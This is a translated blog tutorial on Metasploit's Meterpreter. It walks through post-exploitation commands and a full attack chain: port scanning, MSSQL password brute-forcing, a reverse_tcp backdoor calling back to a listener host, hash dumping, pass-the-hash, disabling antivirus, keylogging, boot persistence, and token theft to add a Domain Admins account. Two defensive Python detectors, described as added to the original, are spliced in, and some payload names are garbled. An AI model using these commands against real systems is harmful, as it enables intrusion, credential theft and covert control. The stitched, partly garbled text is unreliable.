Brief description of Meterpreter

Source: Internet
Author: User

Meterpreter: the Metasploit shellcode payload for Windows!


The Metasploit Framework is an auxiliary tool for buffer overflow testing; it can also be called a vulnerability exploitation and testing platform. It integrates common overflow vulnerabilities and popular shellcode for various platforms and is constantly updated, which makes buffer overflow testing easy and convenient.


"Exploit" refers to vulnerabilities and their exploitation: using every available tool and method to find every vulnerability that can be found, and then analyzing the vulnerability data for a particular purpose.


Metasploit tool home page: http://www.metasploit.com

Metasploit framework: http://www.metasploit.com/framework/download


Using the overflow tools provided in BackTrack 5, once the overflow succeeds we obtain a meterpreter session over the overflow connection.



Features of Meterpreter

Meterpreter is an extension module of the Metasploit framework, used as the payload after a successful overflow. Once the overflow attack succeeds, the payload returns a control channel to us; using it as the payload gives us a meterpreter shell on the target system.

Its functions include screen capture, remote control, keystroke capture, clearing applications, displaying the remote host's system information, displaying the remote machine's network interfaces and IP addresses, and so on.

In addition, meterpreter can evade intrusion detection systems. It hides itself on the remote host without changing the files on the system hard disk, so a host-based intrusion detection system (HIDS) has difficulty responding to it. Moreover, the system time changes while it runs, so tracking or terminating it becomes very difficult even for an experienced person.

Finally, meterpreter simplifies the creation of multiple sessions, which can then be used for penetration.



Advantages of how meterpreter works:
1. It does not create a new process (it uses memory injection).
2. meterpreter is an interpreter that loads various attack commands.
3. It works in the context of the attacked process.
4. Communication uses an encrypted TLV protocol, which can evade IDS.
5. No hard disk write operations.
6. Communication is channel based: it can work with several channels at the same time and supports multi-channel operation.
7. It is extensible.


Meterpreter working process:
1. Vulnerability exploitation code + first-stage payload.
2. The payload connects back to msf.
3. The second-stage payload is sent: msf sends the meterpreter server DLL.
4. The client and the server communicate.


Common system commands:
background: put the current session in the background and bring it back when necessary.
getuid: view the user account meterpreter is running as on the target.
ps: list all processes.
getpid: return the process id that meterpreter is running in.
sysinfo: show system information and architecture.
shell: switch to a cmd shell with system permissions.
exit: exit the shell session back to meterpreter, or terminate meterpreter.


Process migration and elevation of privilege: getsystem automatically tries various system vulnerabilities to elevate privilege; migrate moves meterpreter into another process ID.


Establishing multiple communication channels with the target:
execute is used to open multiple independent communication channels: execute -f exploit.exe -c (channel mode).
channel -l lists the available communication channels.
interact <channel id> interacts with a channel (to obtain cmd).
write 3 writes data to channel 3, ending the input with '.'.



Common file system commands:
pwd: show the current working directory; cd: change to the desired working directory.
search -f *.doc -d c:\ : search for files.
download c:\a.doc /root : download to the local root directory.
upload /root/mm.exe c:\sys.exe : upload to the remote host.
timestomp: change file time attributes. timestomp c:/a.doc -v : view the file's time information.
timestomp c:/a.doc -c "9/23/2013 14:22:11" : modify the file creation time; -m and -a modify the modification time and last access time; -z modifies all times (avoid it whenever possible); -v views.
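From the defender's side, timestomp as described above rewrites the $STANDARD_INFORMATION times that SetFileTime exposes, while the $FILE_NAME times in the MFT keep their original values, and a time given as "9/23/2013 14:22:11" has no sub-second part. The following added example (not from the original post) applies those two heuristics to constructed MFT-style records; the field names and the sample values are assumptions.

```python
"""Flag files whose $STANDARD_INFORMATION (SI) times look rewritten.
Records are constructed to mimic an MFT parser's output; times are
Windows FILETIME values (100-ns ticks since 1601-01-01)."""
from datetime import datetime, timezone

TICKS_PER_SEC = 10_000_000
_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> int:
    """Exact FILETIME conversion (avoids float rounding of total_seconds)."""
    td = dt - _EPOCH
    return (td.days * 86400 + td.seconds) * TICKS_PER_SEC + td.microseconds * 10


def assess(record: dict) -> list:
    """Return the timestomp indicators present in one record."""
    reasons = []
    # A file cannot have been created (SI) before its MFT name entry (FN)
    # was written; timestomp -c backdates SI only.
    if record["si_created"] < record["fn_created"]:
        reasons.append("SI creation time precedes FN creation time")
    # timestomp's "M/D/YYYY HH:MM:SS" format yields whole-second values;
    # genuine NTFS times almost always carry a sub-second fraction.
    if record["si_created"] % TICKS_PER_SEC == 0:
        reasons.append("SI creation time has zero sub-second precision")
    return reasons


def scan(records: list) -> dict:
    """Map path -> indicator list for every record that raised at least one."""
    return {r["path"]: hits for r in records if (hits := assess(r))}


_ORIGINAL = to_filetime(datetime(2013, 10, 1, 9, 15, 32, 441827, tzinfo=timezone.utc))
_BACKDATED = to_filetime(datetime(2013, 9, 23, 14, 22, 11, tzinfo=timezone.utc))

SAMPLE_RECORDS = [  # constructed sample data
    {"path": r"c:\reports\q3.doc", "si_created": _ORIGINAL, "fn_created": _ORIGINAL},
    {"path": r"c:\a.doc", "si_created": _BACKDATED, "fn_created": _ORIGINAL},
]

if __name__ == "__main__":
    for path, hits in scan(SAMPLE_RECORDS).items():
        print(path, "->", "; ".join(hits))
```

The whole-second check alone is weak (files copied from FAT media also lack a fraction), so treat it as corroboration for the SI-before-FN check rather than as proof.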




Common network commands:
ipconfig: view the IP configuration.
route: display the routing table; it can also configure routes, as on Linux: route add <ip address> <mask> <gateway>.
portfwd: add a new forwarding rule, e.g. portfwd -a -L 127.0.0.1 -l 888 -h 7.6.5.4 -p 5631 (-a add a port forward, -L the address to bind, -l the local port, -h the remote host, -p the remote port): connections to 127.0.0.1 port 888 are forwarded to 7.6.5.4 port 5631.
enumdesktops: list all accessible desktops.
getdesktop: return the user's current desktop; setdesktop: set the session's desktop.
keyscan_start: install the keyboard logger; keyscan_dump: export the keystrokes recorded on the active desktop.
About Windows desktop numbers: 0 is the console; 1, 2 and so on are other sessions or remote logins.




Meterpreter scripts:
Run them with: run <scriptname>
① VNC script, to get control of the remote machine's VNC interface: meterpreter> run vnc ; meterpreter> run screen_unlock
② Migrate the process and keep the connection. Example: meterpreter> run post/windows/manage/migrate (on 64-bit Windows 7, migrate needs a backdoor executed with administrator permission to succeed, and the permissions obtained before and after migrate are different.)
③ Disable the anti-virus software: meterpreter> run killav (use this script with caution; it may cause a blue screen crash on the target machine.)
④ Obtain the system password hashes: meterpreter> run hashdump (on 64-bit Windows 7 the backdoor must be executed with administrator privilege and getsystem run first. The success rate of dumping hashes with run post/windows/gather/hashdump is higher. If you want to use shell to add a system account on Windows 7, you must first run run post/windows/escalate/bypassuac, otherwise it may not succeed.)
⑤ Obtain system traffic data: meterpreter> run packetrecorder -i 1
⑥ Do many things at once (get the password, download the registry, obtain the system information, etc.): meterpreter> run scraper
⑦ Persistence, so that the target machine can still be controlled after a restart: meterpreter> run persistence -X -i 50 -p 443 -r 192.168.1.111 (-X start at boot, -i connection interval, -p port, -r IP). To receive the next connection: msf> use multi/handler ; set payload windows/meterpreter/reverse_tcp ; set LPORT 443 ; set LHOST 192.168.1.111 ; exploit (it writes files with random file names to locations and registry keys such as: C:\Users\YourUserName\AppData\Local\Temp\MXIxVNCy.vbs , C:\Users\YourUserName\AppData\Local\Temp\radF871B.tmp\svchost.exe , HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DjMzwzCDaoIcgNP)
The integrated POST modules can operate on multiple sessions at the same time. For example, to obtain hashes: meterpreter> run post/windows/gather/hashdump. There are many other operations; press TAB to complete them and see them all: run post/<TAB>
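The persistence artifacts listed in ⑦ (a randomly named .vbs or a stray svchost.exe under the user's Temp folder, started from a Run value with a random name) are what a defender audits for. The following is an added example, not code from the original post: it applies those checks to constructed Run-key entries; the heuristics, sample paths and value names are assumptions.

```python
"""Flag autorun (Run key) entries resembling the persistence artifacts above.
Entries are constructed (value name, command line) pairs as exported from
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run."""
import re

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SCRIPT_RE = re.compile(r"\.(vbs|js|bat|ps1)\b", re.IGNORECASE)
SVCHOST_RE = re.compile(r"\\svchost\.exe\b", re.IGNORECASE)
# svchost.exe legitimately lives only under System32 / SysWOW64
SYSDIR_RE = re.compile(r"\\Windows\\(System32|SysWOW64)\\", re.IGNORECASE)


def looks_random(name: str) -> bool:
    """Heuristic: alphanumeric name with case flipping on most letter pairs
    (e.g. DjMzwzCDaoIcgNP); real product names such as OneDrive flip rarely."""
    if len(name) < 8 or not name.isalnum():
        return False
    flips = sum(
        1 for a, b in zip(name, name[1:])
        if a.isalpha() and b.isalpha() and a.isupper() != b.isupper()
    )
    return flips >= len(name) // 2


def check_entry(value_name: str, command: str) -> list:
    """Return the reasons one Run entry is suspicious (empty if none)."""
    reasons = []
    if TEMP_RE.search(command):
        reasons.append("launches from the user's Temp directory")
    if SCRIPT_RE.search(command):
        reasons.append("autorun of a script file")
    if SVCHOST_RE.search(command) and not SYSDIR_RE.search(command):
        reasons.append("svchost.exe outside the system directory")
    if looks_random(value_name):
        reasons.append("random-looking value name")
    return reasons


def scan(entries: list) -> dict:
    """Map value name -> reasons for every flagged entry."""
    return {name: r for name, cmd in entries if (r := check_entry(name, cmd))}


SAMPLE_RUN_ENTRIES = [  # constructed sample data
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    ("DjMzwzCDaoIcgNP", r"C:\Users\alice\AppData\Local\Temp\MXIxVNCy.vbs"),
    ("Updater", r"C:\Users\alice\AppData\Local\Temp\radF871B.tmp\svchost.exe"),
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_RUN_ENTRIES).items():
        print(name, "->", "; ".join(reasons))
```

Pair the Run-key audit with the same checks on the HKCU hive and on scheduled tasks, since the same dropper locations appear there.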



When the target system is overflowed, meterpreter is used as the payload to return a shell to the tester, which can be used to perform more operations on the target machine. Example:
msf> nmap -sT -A -P0 192.168.1.130 # probe open services. If you have detected ports 1433 (TCP) and 1434 (UDP), i.e. mssql:
msf> nmap -sU 192.168.1.130 -p 1434 # confirm the port is open
msf> use auxiliary/scanner/mssql/mssql_ping ; show options ; set RHOSTS 192.168.1.1/24 ; set THREADS 20 ; exploit
This yields the server name, version number and other information.
msf> use auxiliary/scanner/mssql/mssql_login ; show options ; set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt # brute-force the login password.
Next, use the xp_cmdshell function provided by mssql to add an account: msf> use exploit/windows/mssql/mssql_payload ; show options ; set payload windows/meterpreter/<payload name garbled in the source>
After obtaining a meterpreter shell, you can execute more operations. Get the screen: screenshot. System information: sysinfo. Prepare a process number, e.g. 1668: meterpreter> migrate 1668 # move into this process. meterpreter> run post/windows/capture/keylog_recorder # run the recording module, which saves the keystrokes to a local txt: cat /root/.msf3/loot/*****.txt
Obtain the system accounts and passwords: meterpreter> use priv ; meterpreter> run post/windows/gather/hashdump. If the plaintext password cannot be cracked from the hash and the hash cannot be used for login directly, use the pass-the-hash technique: msf> use windows/smb/psexec ; set payload windows/meterpreter/<payload name garbled in the source> ; set the password hash option to the dumped hash (the source shows b75989f65d1e04af7625ed712ac36c29) ; exploit
This obtains SYSTEM permission. Create an ordinary account and then use it to run our backdoor program: execute net user hacker pass /add on the target machine. Generate the backdoor program: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=443 X > payload.exe ; copy payload.exe to the target machine and run it with the newly created account.
Start the local listener and wait for the connection from the target machine: msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=443 ; then use priv ; getsystem ; getuid to obtain SYSTEM permission.


Token impersonation: when a domain controller account has logged on to the server, you can use token impersonation during penetration to obtain domain administrator permission; after that you no longer need to log on to other machines. meterpreter> ps # view the processes on the target machine and find the process ID of the domain controller account, e.g. PID 380: meterpreter> steal_token 380. Sometimes the processes listed by ps do not contain a process of the domain controller account; then use the incognito module to view the available tokens: meterpreter> use incognito ; meterpreter> list_tokens -u # list available tokens. If you find one: meterpreter> impersonate_token SNEAKS.IN\ihazdomainadmin ; meterpreter> add_user hacker password -h 192.168.1.50 # add an account ; meterpreter> add_group_user "Domain Admins" hacker -h 192.168.1.50 # add the account to the domain administrators group




This article is from the "no trace" blog, please be sure to keep this source http://hucwuhen.blog.51cto.com/6253667/1303733
